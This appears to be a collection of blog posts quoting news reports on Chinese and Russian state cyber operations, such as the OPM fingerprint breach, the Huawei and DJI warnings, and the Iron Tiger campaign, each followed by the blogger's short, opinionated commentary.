CNBC reports on Australia’s Department of Defense prohibiting the popular Chinese chat app WeChat from being used on its network assets:

Messaging and e-payment app WeChat has become the latest Chinese technology to be banned by an overseas military on security grounds, with Australia instructing its armed forces not to use it.

The country’s defence department said the service did not meet its standards, although it did not directly link the ban to security concerns.

“Software and applications that do not meet Defence standards will not be authorised for use on Defence networks and mobile devices,” the country’s defence department said in an email statement. “Defence has a strict policy concerning the use of social media on its networks and mobile devices. Defence allows very few applications on Defence mobile devices. WeChat has not been authorised for use.”

Australia is part of the Five Eyes, so it should come as no surprise to see them banning Chinese internet technology. It simply boils down to a matter of trust, and it is hard to have any when China is wreaking havoc all over the world, even if they have been a bit quiet lately.

Ars Technica reports on what may be one of the largest malware-driven currency mining operations, currently generating more than $3 million in cryptocurrency thus far:

The unknown criminals generated the windfall over the past 18 months. The campaign has mainly exploited critical vulnerabilities on Windows computers and then, once gaining control over them, installing a modified version of XMRig, an open-source application that mines the digital coin known as Monero. While the group has used a variety of mining services, it has continued to dump the proceeds into a single wallet. As of last week, the wallet had received payouts of almost 10,829 Monero, which, at current valuations, are worth more than $3.4 million.

“The perpetrator, allegedly of Chinese origin, has been running the XMRig miner on many versions of Windows and has already secured him over $3 million worth of Monero cryptocurrency,” researchers at security firm Check Point wrote in a blog post. “As if that wasn’t enough though, he has now upped his game by targeting the powerful Jenkins CI server, giving him the capacity to generate even more coins.”

The Jenkins Continuous Integration server is open-source software written in Java for deploying and automating all kinds of tasks. With more than 1 million users, it’s one of the most widely used open-source automation servers. In January, independent researcher Mikail Tunç estimated that as many as many as 20 percent of Jenkins servers are misconfigured in ways that make serious hacks possible. The compromises cause slower performance and potential denial-of-service failures on compromised machines.

That is an unreal amount of money generated from such an insignificant amount of work.

CNBC is reporting the six top US intelligence agency directors are cautioning Americans from purchasing phones from Chinese telecom giant Huawei:

The six — including the heads of the CIA, FBI, NSA and the director of national intelligence — first expressed their distrust of Apple-rival Huawei and fellow Chinese telecom company ZTE in reference to public servants and state agencies.

When prompted during the hearing, all six indicated they would not recommend private citizens use products from the Chinese companies.

“We’re deeply concerned about the risks of allowing any company or entity that is beholden to foreign governments that don’t share our values to gain positions of power inside our telecommunications networks,” FBI Director Chris Wray testified.

“That provides the capacity to exert pressure or control over our telecommunications infrastructure,” Wray said. “It provides the capacity to maliciously modify or steal information. And it provides the capacity to conduct undetected espionage.”

Huawei, much like ZTE, is so close to the Chinese government they almost appear to be a quasi-government agency, even though the companies would claim otherwise. However, the same could be said for US telecom giants Verizon and AT&T. Both of the latter companies have such a cozy relationship with the US government they can pretty much get away with doing the governments bidding without any fear of reprisal.

On the one hand, it is understandable for the US intelligence agencies to recommend avoiding Chinese technology providers. On the other hand, what happens when governments across the globe start recommending their citizens avoid US technology giants like Apple, Google, and others?

This seems like a slippery slope to travel.

TechCrunch reports:

Intel notified some of its customers of the security flaws in its processors, dubbed Spectre and Meltdown, but left out the U.S. government as part of that. Some of the companies Intel notified included Chinese technology companies, though the report suggests there is no evidence that any information was misused. An Intel spokesperson said that the company wasn’t able to tell everyone it planned because the news was made public earlier than expected.

So the real questions are: did China inform Russia of these vulnerabilities, and has Russia created tools to leverage these exploits? Why would Intel hide this information from the United States government?

This goes back to something I am adamantly against: withholding news of vulnerabilities of this nature so the intelligence communities can stockpile and leverage internally developed exploit kits to their so-called advantage.

The New York Times reports on the global desire for nations to be able to protect themselves from the highly sophisticated actors like China, Russia, Iran, North Korea, and others:

Securing the world against cyberattacks — from nations, criminal groups, vandals and teenagers — will be on the agenda when many of the world’s top leaders gather at the World Economic Forum in Davos, Switzerland, this week. As usual, there is a flurry of reports, and entrepreneurs will declare they have technological solutions at hand. But the fact remains that the major powers of the world have been unable to come up with a viable means of deterring the most damaging attacks. It still takes too long to formally identify the culprits, and the responses, as Mr. Bossert indicated, are insufficient.

Efforts to establish “norms of behavior” got a promising start, but are now falling apart. No one can even agree on when an act of aggression in cyberspace amounts to an act of war. The Pentagon, in its first nuclear strategy review since President Trump took office, is even proposing to use the threat of unleashing nuclear weapons against a country or group that delivered a devastating cyberattack against the critical infrastructure of the United States or its allies. But that doesn’t help with the problem of everyday attacks.

The most talented state sponsors of attacks — mostly Russia, China, Iran and North Korea — have carefully calibrated their operations in cyberspace to achieve their strategic aims while avoiding a real shooting war. So far they have succeeded. While there have been indictments of Iranian and Chinese hackers in major strikes on the United States, they have never seen the inside of an American courtroom.

Geopolitical cyber attacks are the new cold war.

Infosecurity Group reports on Russian and Chinese cyber operations capabilities:

Russia and China are the two nation-states with the most concerning capabilities, the report said. Both are considered to possess the highest levels of technical sophistication, reserved for only a select set of countries. The actors can engage in full-spectrum operations, utilizing the breadth of capabilities available in cyber-operations in concert with other elements of state power, including conventional military force and foreign intelligence services with global reach. The capabilities they have are thus alarmingly advanced, according to Flashpoint: “Kinetic and cyber-attacks conducted by the threat actor(s) have the potential to cause complete paralysis and/or destruction of critical systems and infrastructure. Such attacks have the capacity to result in significant destruction of property and/or loss of life. Under such circumstances, regular business operations and/or government functions cease and data confidentiality, integrity, and availability are completely compromised for extended periods,” the report noted.

For Russia’s part, its state-sponsored hacking arms (such as Fancy Bear) remain highly active, capable and influential, the report said, with retaliatory and cyber-influence activity expecting to ramp up as it is increasingly isolated from the West following election interference and information operations against Western democracies.

“Moreover, Moscow continues to crack down on digital dissent and segregate itself from the global internet,” the report found. “The result is a country moving quickly toward a unique model of domestic information control via technical control of internet infrastructure, services and data, a lack of online anonymity, and censorship.”

As for China, it too remains an active and highly capable actor in cyberspace on multiple levels, although state-sponsored activity against Western targets has dropped off a bit. The report cautions decision makers not to grow complacent.

Both China and Russia are two of the most sophisticated countries with cyber operations capabilities. However, the two countries leverage cyber for diametrically opposed reasons. Russia is interested in destabilizing the globe, while China, primarily, utilizes cyber as a means of either propping up its own economic goals or for espionage.

There are so many unintended consequences of artificial intelligence I feel as if we are nowhere near the tip of the iceberg. Consider how Chinese company iFlyTek is leveraging AI in multiple industrial and commercial applications, but also has a close working relationship with the Chinese government. There are many dark ways the government may utilize the data companies like iFlyTek can provide:

As China tests the frontiers of artificial intelligence, iFlyTek serves as a compelling example of both the country’s sci-fi ambitions and the technology’s darker dystopian possibilities.

The Chinese company uses sophisticated A.I. to power image and voice recognition systems that can help doctors with their diagnoses, aid teachers in grading tests and let drivers control their cars with their voices. Even some global companies are impressed: Delphi, a major American auto supplier, offers iFlyTek’s technology to carmakers in China, while Volkswagen plans to build the Chinese company’s speech recognition technology into many of its cars in China next year.

At the same time, iFlyTek hosts a laboratory to develop voice surveillance capabilities for China’s domestic security forces. In an October report, a human rights group said the company was helping the authorities compile a biometric voice database of Chinese citizens that could be used to track activists and others.

Those tight ties with the government could give iFlyTek and other Chinese companies an edge in an emerging new field. China’s financial support and its loosely enforced and untested privacy laws give Chinese companies considerable resources and access to voices, faces and other biometric data in vast quantities, which could help them develop their technologies, experts say.

Colour me unsurprised to hear a Chinese drone manufacturer is sharing videos of US critical infrastructure and law enforcement to the Chinese government:

DJI, one of the leading manufacturers of consumer and commercial drones sold in the United States, has been accused by US officials of “Providing U.S. critical infrastructure and law enforcement data to the Chinese government.”

DJI notes, for example, that it does not force its customers to upload their flight videos to the company’s servers, and that it has access to only those videos that its customers have actively sent to the firm’s equipment.

While China-based DJI is a dominant player in both the commercial and consumer drone markets in North America, the government accusation focuses on commercial drones – not consumer drones; it is not clear whether that is because the government does not believe DJI is sharing consumer drone data, or because commercial drone data sharing is likely a far bigger national security risk.

The current controversy over DJI comes just months after a similar controversy arose with US government officials accusing cybersecurity product vendor, Kaspersky Lab, of providing data to the Russian government.

The memo notes that “The Chinese government is likely using information acquired from DJI systems as a way to target assets they are planning to purchase. For instance, a large family-owned wine producer in California purchased DJI UAS to survey its vineyards and monitor grape production. Soon afterwards, Chinese companies began purchasing vineyards in the same area. According to the SOI, it appeared the companies were able to use DJI data to their own benefit and profit.”

Bottom line: do not buy anything from DJI ever again.

The US has charged three Chinese nationals with hacking, even though President’s Obama and Jinping agreed in a 2015 deal to cease stealing intellectual property from each other:

The charges being brought in Pittsburgh allege that the hackers stole intellectual property from several companies, including Trimble, a maker of navigation systems; Siemens, a German technology company with major operations in the US; and Moody’s Analytics.

US investigators have concluded that the three charged by the US attorney in Pittsburgh were working for a Chinese intelligence contractor, the sources briefed on the investigation say.

A 2015 deal between then-President Barack Obama and Chinese President Xi Jinping prohibits the US and China from stealing intellectual property for the purpose of giving advantage to domestic companies.

Obama administration officials had touted the Obama-Xi agreement, as well as 2014 Justice Department charges against members of the Chinese People’s Liberation Army for commercial espionage, for reducing some of the Chinese cyberactivity against companies in the US. But the 2015 Obama-Xi deal was met with skepticism inside the US agencies whose job it is to guard against Chinese cyberactivity targeting US companies.

In the waning months of the Obama administration, intelligence officials briefed senior White House officials on information showing that the Chinese cyberattacks were back to levels previously seen, sources familiar with the matter told CNN. Early in the Trump administration, US intelligence officials briefed senior officials, including the President and vice president, as well as advisers Jared Kushner and Steve Bannon.

Did anyone actual think China would honor this deal? It was likely more symbolic than an actual agreement.

China is close to codifying a new controversial cyber security law most foreign business are going to have a tough time swallowing:

The draft law would require companies to “comply with social and business ethics” and “accept supervision by both government and the public,” according to the state news agency Xinhua.

It would also stipulate that Chinese citizens’ personal information and other data collected in China must be housed in the country.

A new provision would also order Beijing to “monitor and deal with threats from abroad to protect the information infrastructure from attack, intrusion, disturbance or damage.”

This should not come as a surprise, and I wonder what makes it so controversial in the first place. Looked at from the obvious Chinese perspective, many highly popular cyber security businesses are from the United States. As far as China is concerned, any American business is tied up with the American government, and thus merely an extension of the NSA, CIA, and other intelligence agencies. This law allows China to maintain some semblance of control of the cyber security being provided in their country.

Of course foreign business are going to complain. This law is being codified in public, with the Chinese government basically admitting bias. Contrast that to how the United States handles this same issue, whereby there is no official written law on the books, but rather, a de-facto ban against Chinese cyber security firms.

Raytheon wins $1 billion cyber security contract to battle attacks on US agencies:

The contract, one of the largest civilian cybersecurity orders in years, would help more than 100 federal civilian agencies protect their networks against malicious hackers, and it comes after the Office of Personnel Management suffered one of the most damaging breaches in history.

The OPM recently said that hackers stole the fingerprints of 5.6 million people, far more than previously thought. The attacks are believed to have affected more than 21 million former and current government employees, whose personal information, including Social Security numbers and information used in security clearances, may have been compromised.

The Obama administration has said it has made cybersecurity a top priority, and Congress has pushed to expand the nation’s defenses and make them more robust. The Pentagon is also taking steps to develop ways to fend off hackers, who often only have to find one crack in a network, while defenders have to guard the entire wall.

At a hearing on cybersecurity Tuesday, Sen. John McCain (R-Ariz.) said that in the past year, Iran, North Korea, China and Russia have all launched cyber­attacks on the United States. And he said the rate of the attacks has increased, “crippling or severely disrupting networks across the government and private sector and compromising sensitive national security information.”

He added: “Far more needs to be done to develop the necessary capabilities to deter attacks, fight and win in cyberspace.”

According to John McAfee, cyberwar[sic] is here, and China is the enemy:

We have to get a clue. We are in the early stages of a cyberwar. As a candidate for President of the very nation under attack, I would be remiss in my duties if I did not shed light on our reality.

I am going to make the following prediction:

On September 25, when Xi Jinping meets President Obama, we will not have a single concrete response to the war that has been declared on us by the Chinese. By “concrete” I mean economic sanctions that take place on the 25th, or other immediate, visible actions. Our president is smart enough to know that the Chinese will merely laugh at any threat of “future” actions, such as “next week we are going to…”

The Chinese have been involved in diplomatic relations for 5,000 years. The U.S. has only existed for less than 250 years. Guess which nation has the advantage here. Any announcement that does not include “starting today, no Chinese cargo ship will be allowed in any U S. port,” or something of similar magnitude, will be seen by the Chinese as confirmation of our idiocy.

If this sounds extreme, then wake up. We are at war.

Well there you have it. Since Mr. John McAfee, Presidential candidate thinks so, I guess the US government needs to get right on it!

Another week, another round of bad news about the OPM breach. This time we learn the fingerprints of 5.6 million US government employees was exfiltrated by the ostensible Chinese hackers:

The attack on the agency, which is the main custodian of the government’s most important personnel records, has been attributed to China by American intelligence agencies, but it is unclear exactly what group or organization engineered it. Before Wednesday, the agency had said that it lost only 1.1 million sets of fingerprints among the records of roughly 22 million individuals that were compromised.

“Federal experts believe that, as of now, the ability to misuse fingerprint data is limited,” the agency said in a written statement. But clearly the uses are growing as biometrics are used more frequently to assure identity, in secure government facilities and even on personal iPhones.

The working assumption of investigators is that China is building a huge database of information about American officials or contractors who may end up entering China or doing business with it. Fingerprints could become a significant part of that effort: While a Social Security number or a password can be changed, fingerprints cannot.

Customs and immigration officials frequently fingerprint incoming travelers; millions of fingerprints in a Chinese database would help track the true identities of Americans entering the country.

“I am assuming there will be people we simply can’t send to China,” a senior intelligence official said this summer, before the most recent revelation. “That’s only part of the damage.”

The agency said that an “interagency working group,” with help from the F.B.I., the Department of Homeland Security and the intelligence agencies, “will review the potential ways adversaries could misuse fingerprint data now and in the future.”

The OPM breach is going to be studied for the next few years and will become the premier case study on how not to conduct cyber security. It is amazing they still have not increased their cyber defense capabilities since this all came to light a few short months ago.

Even though Russia has highly advanced cyber attack capabilities, this does not mean they are immune to operations designed to breach their networks. It would seem China may have conducted a cyber attack against the Russian military:

“There is a world market for classified data of any time,” said Epstein. “There are documented cases in the past where private hackers hacked into various institutions and then sold the data to nation states. The lines are increasingly blurred in the world of cybersecurity.”

The attack starts with a well-written Russian-language email that seems to come from someone else in the targeted military division or an analyst section from the same group of the military, he said.

It comes with an attached document, a Microsoft Word file with a published article about the history of military testing in Russia.

“It’s a decoy document,” said Epstein. “You double-click on it, you open it, you read it, you think, ‘Ah, that was kind of interesting.’ Then you close it and you don’t think about it again. But when it closes, it activates a macro, and the macro triggers a secondary file to take action, which is to download a third file, which is the nasty stuff.”

That’s when the malware takes over the computer and everything the user has access to, the attackers now have access to.

“Any anti-virus program wouldn’t see a virus in the document because there’s no virus in the document,” he said. “And the trigger on closing is a common anti-sandboxing technique because most sandboxes check for triggering when documents are opened, not when they are closed.”

This is a fairly standard, yet highly advanced, technique for confusing endpoint anti-virus. This is why layered defenses extend beyond the network and need to be implemented at the endpoint level too. Tools like application whitelisting, host intrusion prevention, and desktop firewalls, when used together, can severely minimize the possibility of these types of malware from successfully executing.

Who here wonders if this attack was actually perpetrated by the United States but made to appear as if China is responsible?

Another day, another news item about state-backed Chinese-based cyber attacks. This time Trend Micro has released a comprehensive report detailing how China-based cyber attacks on US military targets are “Advanced, Persistent And Ongoing”:

In its blog announcing the paper, Trend Micro stated that “Operation Iron Tiger is a targeted attack campaign discovered to have stolen trillions of bytes of data from defense contractors in the U.S., including stolen emails, intellectual property, and strategic planning documents.” The report further details that targets of Iron Tiger included military defense contractors, intelligence agencies, FBI-based partners, and the U.S. government. The private entities were tech-based government contractors in the electric, aerospace, intelligence, telecommunications, energy, and nuclear engineering industries.

Iron Tiger was observed exfiltrating up to 58GB worth of data from a single target, more than was stolen in the Sony attack. It could have potentially stolen up to terabytes of data in total, Trend Micro reports. It is highly environmentally adaptive and otherwise sophisticated and well organized, potentially merely an arm of a larger, multi-teamed operation with various targets.

China is convincingly Iron Tiger’s home base

The primary situs of China as the operatives’ home base was convincingly evidenced by the facts that the operatives used virtual private network (VPN) servers that only accepted China-based registrants, used Chinese file names and passwords, and operated from China-registered domains, according to the report. Some of Iron Tiger’s actions were also attributed Iron to an individual physically located in China.